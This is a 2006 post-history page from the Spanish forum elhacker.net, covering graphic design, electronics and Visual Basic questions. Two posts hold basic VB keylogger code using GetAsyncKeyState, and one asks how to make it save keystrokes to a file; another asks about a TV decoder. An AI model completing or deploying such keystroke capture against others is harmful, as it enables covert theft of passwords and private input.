elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: [1] 2
1  Programación / Programación Visual Basic / Duda con GetAsynKeyState en: 4 Diciembre 2006, 17:57 pm
Es que cuando pongo el getasynkeystate me dice error de compilacion: Procedimiento sub o Function no definido.

Es de este codigo que alguien puso aqui sobre los keyloggers:

Dim i As Integer, a As Integer
For i = 0 To 256
a = GetAsyncKeyState(i)
If a  = -32767 Then
Text1.Text = Text1.Text + Chr(i)
End If
Next


Lo pues en el form load y puse el end sub.

Que puede ser?

S4Lu2!!
2  Media / Diseño Gráfico / Una preguntilla sobre dibujar animaciones en: 7 Agosto 2006, 13:23 pm
Pues veran, ya se que es una pregunta un poco tonta :P pero me gustaria saber como empezais ha dibujar vuestras animaciones, si las dibujais a papel y a lapiz y luego las pasais al ordenador escaneandolas o las dibujais directamente con el photoshop o algun otro programa que sea especifico para dibujar(si especificais alguno bueno, mejor jeje)¿?¿?

S4Lu2!!
3  Informática / Electrónica / Reciclar Game Boy ColoR? en: 27 Julio 2006, 11:50 am
Pues no se ya no uso mucho la GBC y la verdad no se que hacer con ella, a lo mejor luego con el tiempo se revaloriza, xDD. Pues a ver si me dan alguna ideilla para convertir la GBC en algo..jejej

S4Lu2!!
4  Media / Diseño Gráfico / Ayuda para diseño web en: 18 Julio 2006, 22:48 pm
Pues miren, quería que me aconsejaran o me dieran ideas sobre un diseño para web, que trata sobre la  informática, y también tendra se basara en serie de animaciones en flash..

S4Lu2!! y thanks!
5  Media / Diseño Gráfico / [Tutorial] Terreno de futbol en: 29 Junio 2006, 19:21 pm
TUTORIAL TERRENO DE FÚTBOL

1º-Creamos un documento nuevo de 500 x 500, lo pintamos de verde.
2º-Filtro noise > add noise,  cogemos un 41%, lo debemos poner en gaussian y monocromatico.
3º-Añadimos de nuevo el filtro noise, presionando Ctrl+F
4º-Le aplicamos un filtro Blur > Surface Blur le ponemos en radius 45 pixeles y en Threshold 168


Y os quedara algo asi:



S4Lu2!!

Y ya esta listo nuestro terreno para jugar al futbol xD
6  Informática / Electrónica / Decodificador de ono? en: 26 Junio 2006, 12:43 pm
Hola quisiera saber si hay algun decodificador, algun tipo de software para  el nuevo modelo de ono digital??

S4Lu2!!
7  Programación / Programación Visual Basic / Keylogger en VB ayuda en: 26 Junio 2006, 12:20 pm
Miren tenia este codigo que lo he cogido del tema de la recopilación de links....

Y me gustaria saber que modificaciones son necesarias para poder ejecutarlo y que me mande las pulsaciones de las teclas a un archivo .txt


Código:
'
'Módulo estándar basKeyLogger.bas
'
Option Explicit

Public bLogEnabled As Boolean

Function GetActiveKey() As Integer
         Static bStarted As Boolean
         Dim i%

  If Not bStarted Then
    'Inicializa el estado de las teclas llamando a
    'la función GetAsyncKeyState.
    '
    For i = 1 To 256
      Call GetAsyncKeyState(i)
    Next

    bStarted = True
  End If

  For i = 1 To 256
    'Obtiene la tecla pulsada actualmente.
    '
    If GetAsyncKeyState(i) Then
      GetActiveKey = i
     
      Exit For
    End If
  Next
End Function

Sub StopLog()
  bLogEnabled = False
End Sub

Sub LogKeys()
        Dim snTimer!
        Dim iActiveKey%
        Dim sChar$, sData$

  bLogEnabled = True
 
  Do While bLogEnabled
    snTimer = Timer
   
    Do While (Timer - snTimer) < 0.125
      'Espera 125 milisegundos hasta
      'la próxima pulsación.
    Loop
   
    iActiveKey = GetActiveKey
   
    Select Case iActiveKey
      Case vbKey0 To vbKey9, 32 To 47, vbKeyA To vbKeyZ
        sChar = Chr$(iActiveKey)
     
        sData = sData & sChar
     
      Case vbKeyReturn
        'Imprime lo que tiene en el buffer.
        '
        Debug.Print sData
       
        sData = vbNullString
      Case Else
        'Verifica otras teclas.
    End Select
  Loop

S4Lu2!!
8  Informática / Electrónica / Inicio en la Robotica en: 25 Junio 2006, 21:32 pm
Alguien tiene por hay algun manual o textos de iniciación a la robotica o sabe de alguna web?.

S4Lu2!!
9  Comunicaciones / Hacking Mobile / Es posible hacer esto con el bluetooth? en: 20 Junio 2006, 17:07 pm
Pues querría saber si es posible, hacer que un adaptador usb de 200M, ponerlo como si fuera una tarjeta wirelles???

NOTA: En la caja pone que lleva wirelles.

S4Lu2!!
10  Foros Generales / Sugerencias y dudas sobre el Foro / Problema con mi firma en: 15 Marzo 2006, 15:58 pm
No podira poner lo de emule user a la derecha de mi firma pero arriba no abajo como se pone por defecto?

S4Lu2!
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines